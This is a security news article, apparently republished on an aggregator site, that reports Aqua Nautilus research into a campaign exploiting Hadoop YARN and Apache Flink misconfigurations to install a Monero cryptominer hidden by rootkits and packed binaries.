Attacker Targets Hadoop YARN, Flint Servers in Stealthy Campaign

The adversary is exploiting two known misconfigurations in the big data technologies to drop a Monero cryptominer.

A threat actor is targeting a common misconfiguration in Hadoop YARN and Apache Flink to try and drop Monero cyrptominers in environments running the two big data technologies.
What makes the campaign especially notable is the adversarys use of sophisticated evasion techniques, such as rootkits, packed ELF binaries, directory content deletion, and system configuration modifications to bypass typical threat detection mechanisms.
Researchers from Aqua Nautilus uncovered the campaign when they spotted new attacks hitting one of their cloud honeypots recently. One attack exploited a known misconfiguration in a feature in Hadoop YARN called
ResourceManager
that manages resources for applications running on a Hadoop cluster. The other targeted a similarly known misconfiguration in Flink that, like the YARN issue, gives attackers a way to run arbitrary code on affected systems.
Hadoop YARN
(Yet Another Resource Negotiator) is a resource management subsystem of the Hadoop ecosystem for big data processing. Apache Flink is a
relatively widely used
open source stream and batch processor for event-driven data analytics and data pipeline applications.
Assaf Morag, lead researcher for Aqua Nautilus, says the YARN misconfiguration gives attackers a way to send an unauthenticated API request to create new applications. The Flink misconfiguration allows an attacker to upload a Java archive (JAR) file that contains malicious code to a FLINK server.
Both misconfigurations permit remote code execution, implying that an attacker could potentially gain complete control over the server, Morag says. Given that these servers are used for data processing, their misconfigurations present a data exfiltration risk. Furthermore, these servers are typically interconnected with other servers within the organization, which could facilitate lateral movement by the attacker, Morag says.
In the attack on Apache Nautilus honeypots, the adversary exploited the misconfiguration in Hadoop YARN to send an unauthenticated request to deploy a new application. The attacker was then able to execute remote code on the misconfigured YARN by sending a POST request, asking it to launch the new application using the attackers command. To establish persistence, the attacker first deleted all cron jobs — or scheduled tasks — on the YARN server and created a new cron job.
Aquas analysis of the attack chain showed the attacker using the command to delete the content of the /tmp directory on the YARN server, downloading a malicious file to the /tmp directory from a remote command-and-control server, executing the file, and then again deleting the contents of the directory. Aqua researchers found the secondary payload from the C2 server to be a packed ELF (Executable and Linkable Format) binary that served as a downloader for two different rootkits, one of which was a Monero crypto-currency miner. Malware detection engines on Virus Total did not detect the secondary ELF binary payload, Aqua said.
As these servers are designed for processing big data, they possess high CPU capabilities, Morag says. The attacker is exploiting this fact to run cryptominers, which also require a substantial amount of CPU resources.
Morag says the attack is noteworthy for the different techniques the attacker used to conceal their malicious activity. These included the use of a packer to obfuscate the ELF binary, the use of stripped payloads to make analysis more challenging, an embedded payload within the ELF binary, file and directory permissions modifications, and the use of two rootkits to hide the cryptominer and shell commands.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Attacker Targets Hadoop YARN, Flint Servers in Stealthy Campaign